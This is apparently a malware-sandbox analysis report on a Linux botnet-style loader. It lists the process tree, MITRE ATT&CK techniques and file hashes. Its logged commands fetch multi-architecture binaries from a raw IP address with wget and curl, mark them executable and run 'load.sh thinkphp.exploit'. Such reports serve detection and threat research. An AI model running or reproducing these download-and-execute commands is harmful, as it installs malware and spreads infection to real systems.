/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 db0fa4b8db0333367e9bda3ab68b8042.x86_64 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1585
-
-
/usr/bin/wgetwget http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc2⤵
- Writes file to tmp directory
PID:1586
-
-
/usr/bin/curlcurl -O http://87.236.95.134/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/catcat db0fa4b8db0333367e9bda3ab68b8042.arc2⤵PID:1588
-
-
/bin/chmodchmod +x 220d36bded88e96516faa4ccdd36e291ad8a7639f36d51e2a3f18098f14f7a0c.sh config-err-TtKvLo db0fa4b8db0333367e9bda3ab68b8042.arc db0fa4b8db0333367e9bda3ab68b8042.arm db0fa4b8db0333367e9bda3ab68b8042.arm5 db0fa4b8db0333367e9bda3ab68b8042.arm6 db0fa4b8db0333367e9bda3ab68b8042.arm7 db0fa4b8db0333367e9bda3ab68b8042.i686 db0fa4b8db0333367e9bda3ab68b8042.m68k db0fa4b8db0333367e9bda3ab68b8042.mips db0fa4b8db0333367e9bda3ab68b8042.mpsl db0fa4b8db0333367e9bda3ab68b8042.ppc db0fa4b8db0333367e9bda3ab68b8042.sh4 db0fa4b8db0333367e9bda3ab68b8042.spc db0fa4b8db0333367e9bda3ab68b8042.x86 db0fa4b8db0333367e9bda3ab68b8042.x86_64 load.sh netplan_vobrtjej snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-bolt.service-Lt40RB systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-Z8AOk12⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/load.sh./load.sh thinkphp.exploit2⤵
- Executes dropped EXE
PID:1590
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33KB
MD56d1b6e91b1e2037fbf62ca7ddcf04932
SHA1d0769095ec2e678074eb206b3537022129c1a776
SHA2567f307860b88d639313ebd4195f1ef6a8d668d1941c6cbf6dc968961b1fe42782
SHA5127397ef3b4f7d34b0637de721f38ac833ad6d526e9b7cdbc08fdb4b261fa675001a8079ff4b9378fa219090a945126832cb1ab3db86b35da0090b20051d31bb38
-
Filesize
35KB
MD5fd5d7deebbb62aee931a1701a1042450
SHA14adc94ce9de13647815a16d6514b73e109c80785
SHA2567a36bd7a9d19b6d48807264712141dd0543ffebd9db923a76799ffd687f352c9
SHA512cb7beeb8d88ad48ac447b69b215738cdf1d706cb88c4945d0a0837c07dfe41a74107f9c4d7fccc5c7e5719ee9a912452ba3c53c360252bd46978f5d27c1b6df4
-
Filesize
37KB
MD5144cc0c6dfb6f6e395065b02825a9ad1
SHA1dfe5d7d8bef4511b42be1ae0235f7469d97bf789
SHA256117cd63b79b8c0d3753ac6907206872d6527c2d6a641776c1021302d5dcec2b2
SHA5129e5ca9ee3ebef09688d74de6bb4af9d6c1003173ee5846cd2370d4774e9bc92fef317113b19529cd2a5b1d18a38a626ebf6ed2da05e6c7b66e0d1b69d8ddc5d5
-
Filesize
34KB
MD5b478298246ee6d313f4f576d0f7ec4cd
SHA194d25c6d4cfb1e218120d378d14c8d5ab868363b
SHA256ed04f35cc6c4bef7ea8bf398436da916ebfab2490c10bd1d59df70f648e80df5
SHA51283f67116e5c7074dcfa0e98d94697a0db2bdcaed15060aa31ed6a20eb543fd1d10d8fe26856178f78cc7402531de358e4b6c1d294086b18ab891d23954e78307
-
Filesize
30KB
MD5d8893525da7152c787dcc7d6309a61ba
SHA187fa7fb894caaa77a9caa7bca6a5fd3fbe09f7cd
SHA2562a1b03ac26cc72118fb419de4bee3352adf536ee4d5472e8cee14150ca53b8ef
SHA5128fcf808c627c080350adcf005df853a6c1f3fb3e3b2b5d2745a972dcc4064ff731f7cebbbd7d4e8c9ade91727f587356f844b783fa6c90a2191b80a38ca1f6e6
-
Filesize
89KB
MD54c11e8b7fbda3e4bedc53c8207e862b0
SHA1762527ff34f3203f0054691760fe2586d1da6e8b
SHA256e588912ddd689a87e98d7d86b78dbf7965f09681cd9193f1d028c173e0e4260a
SHA5125678b7e300c8d23d25c8185e4749b8b978d6c3fd2b4e2f7ded638d86bd88a6361e5ad690b72bc15f4e2f3606a0831bfe1d624cb59292e35e069fecab83886f6d